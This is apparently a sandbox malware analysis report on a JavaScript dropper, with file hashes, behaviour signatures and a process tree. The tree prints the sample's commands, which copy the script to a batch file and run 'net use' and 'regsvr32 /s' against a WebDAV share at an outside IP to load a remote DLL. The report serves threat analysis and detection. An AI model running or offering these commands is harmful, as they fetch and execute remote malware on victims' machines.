Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
08/07/2024, 18:56
Static task
static1
Behavioral task
behavioral1
Sample
288623129288629811.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
288623129288629811.js
Resource
win10v2004-20240704-en
General
-
Target
288623129288629811.js
-
Size
5KB
-
MD5
27ec8012c9813c8ff50ebe971de23bfb
-
SHA1
8df64433d6f743c2524c7b210a71b2b29b943a81
-
SHA256
327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
-
SHA512
07abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423
-
SSDEEP
96:iQlr8O3jvfPlMOOOOrTTPOOOD9VvK6IiojFVYjMYValVgkxVX:vIO7fdMOOO8zOOO51KtjFVYjMYAl6kxR
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1536 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2316 wrote to memory of 740 2316 wscript.exe 30 PID 2316 wrote to memory of 740 2316 wscript.exe 30 PID 2316 wrote to memory of 740 2316 wscript.exe 30 PID 740 wrote to memory of 2568 740 cmd.exe 32 PID 740 wrote to memory of 2568 740 cmd.exe 32 PID 740 wrote to memory of 2568 740 cmd.exe 32 PID 740 wrote to memory of 1536 740 cmd.exe 33 PID 740 wrote to memory of 1536 740 cmd.exe 33 PID 740 wrote to memory of 1536 740 cmd.exe 33 PID 740 wrote to memory of 1536 740 cmd.exe 33 PID 740 wrote to memory of 1536 740 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\288623129288629811.js1⤵
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\288623129288629811.js" "C:\Users\Admin\\hmidau.bat" && "C:\Users\Admin\\hmidau.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2568
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\419.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1536
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD527ec8012c9813c8ff50ebe971de23bfb
SHA18df64433d6f743c2524c7b210a71b2b29b943a81
SHA256327aad49e2f6cb2b5014d750487a0f3fe5e7102aec23c50407add2ab13b9338e
SHA51207abfb3fac91b07d9642b32615b2d47a5d2cf6d4f6ccf56da6e985e8e3a2f9635d3ffbbe13aff5c74b0f39da2721f1fde84e26bab839a0e7dcb7d34146367423